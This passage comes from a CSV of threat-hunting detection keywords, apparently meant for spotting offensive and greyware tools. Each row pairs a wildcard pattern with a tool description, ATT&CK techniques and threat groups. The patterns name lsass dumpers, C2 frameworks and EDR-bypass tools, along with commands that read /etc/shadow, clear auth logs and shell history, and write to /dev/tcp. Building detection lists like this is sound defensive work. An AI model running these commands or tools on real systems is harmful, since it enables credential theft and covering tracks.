LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*CALLBACK_TOKEN_STOLEN*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 
- T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*CallBackDump*dumpXor*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/seventeenman/CallBackDump,1,1,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*CallbackDump.exe*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,1,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*can_flood_frames*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*CandyPotato.exe *,offensive_tool_keyword,CandyPotato,CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking,T1547.004,TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/CandyPotato,1,0,N/A,N/A,3,289,67,2021-09-16T17:08:52Z,2020-08-21T17:14:30Z -*canix1/ADACLScanner*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,1,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*Cannot enumerate antivirus*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*capcom_sys_exec*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*capcom_sys_exec.x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*CaptainNox/Hypnos*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,1,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*captcha-killer.*.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*CapturedCredential.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CapturedCredential.exe*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z 
-*CapturedHashCredential.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CapturedPasswordCredential.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CapturedTicketCredential.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*capturetokenphish.ps1*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*capturetokenphish.py*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*CarbonCopy*,offensive_tool_keyword,CarbonCopy,A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. 
Works for both Windows and Linux,T1606 - T1553 - T1105 - T1027 - T1562,TA0002 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://github.com/paranoidninja/CarbonCopy,1,0,N/A,N/A,10,1185,276,2020-10-03T03:23:20Z,2018-11-14T04:48:10Z -*CarbonCopy.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*cardano2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*careCrow*_linux_amd64*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*cargo install glit*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*carlospolop/PurplePanda*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z -*cat *.atftp_history*,greyware_tool_keyword,cat,Enumerating user files history for interesting information,T1083 - T1005,TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*cat *.atftp_history*,greyware_tool_keyword,cat,show atftp history,T1552.002 - T1070.004,TA0005 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*cat *.bash_history*,greyware_tool_keyword,cat,Enumerating user files history for interesting information,T1083 - T1005,TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*cat *.bash_history*,greyware_tool_keyword,cat,show bash history,T1552.002 - T1070.004,TA0005 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*cat *.bin | base64 -w 0 > *.txt*,offensive_tool_keyword,cobaltstrike,CACTUSTORCH: Payload Generation for Adversary Simulations,T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mdsecactivebreach/CACTUSTORCH,1,0,N/A,10,10,980,241,2018-07-03T06:47:36Z,2017-07-04T10:20:34Z -*cat *.mysql_history*,greyware_tool_keyword,cat,Enumerating user files history for interesting information,T1083 - T1005,TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*cat *.mysql_history*,greyware_tool_keyword,cat,show mysql history,T1552.002 - T1070.004,TA0005 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*cat *.nano_history*,greyware_tool_keyword,cat,Enumerating user files history for interesting information,T1083 - T1005,TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*cat *.nano_history*,greyware_tool_keyword,cat,show nano history,T1552.002 - T1070.004,TA0005 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*cat 
*.ntds,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*cat *.php_history*,greyware_tool_keyword,cat,Enumerating user files history for interesting information,T1083 - T1005,TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*cat *.php_history*,greyware_tool_keyword,cat,show php history,T1552.002 - T1070.004,TA0005 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*cat *.zsh_history*,greyware_tool_keyword,cat,show zsh history,T1552.002 - T1070.004,TA0005 - TA0009,N/A,N/A,discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*cat *.zsh_history*,greyware_tool_keyword,cat,Enumerating user files history for interesting information,T1083 - T1005,TA0007,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cat *bash-history*,greyware_tool_keyword,cat,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cat ./apache-tomcat-8.5.77/webapps/ROOT/tomcatwar.jsp,offensive_tool_keyword,spring-core-rce,CVE-2022-22965 : 
about spring core rce,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/spring-core-rce,1,0,N/A,N/A,1,54,18,2022-04-01T15:34:03Z,2022-03-30T14:35:00Z -*cat /dev/null > *bash_history*,greyware_tool_keyword,bash,Clear command history in linux which is used for defense evasion. ,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml,1,0,greyware tool - risks of False positive !,N/A,10,8145,2531,2023-10-03T21:23:41Z,2017-10-11T17:23:32Z -*cat /dev/null > /var/log/auth.log*,greyware_tool_keyword,cat,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cat /dev/null > ~/.bash_history*,greyware_tool_keyword,cat,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cat /etc/passwd*,greyware_tool_keyword,cat,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cat /etc/shadow*,greyware_tool_keyword,cat,linux commands abused by attackers - find 
guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cat /etc/sudoers*,greyware_tool_keyword,cat,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cat > /dev/tcp/127.0.0.1*<*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*catphish.rb*,offensive_tool_keyword,catphish,Generate similar-looking domains for phishing attacks. Check expired domains and their categorized domain status to evade proxy categorization. Whitelisted domains are perfect for your C2 servers. 
Perfect for Red Team engagements.,T1565 - T1566 - T1567 - T1596,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ring0lab/catphish,1,1,N/A,N/A,6,583,131,2018-10-16T12:57:25Z,2016-10-24T22:48:51Z -*cb1bf87f2976eb49c5560b16a69c742b39706c48314bcc0bdeeaf545910bd380*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*CB561720-0175-49D9-A114-FE3489C53661*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*CC127443-2519-4E04-8865-A6887658CDE5*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*cc2_keystrokes*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_keystrokes_*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_mimipenguin.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*cc2_portscan*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_portscan_*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - 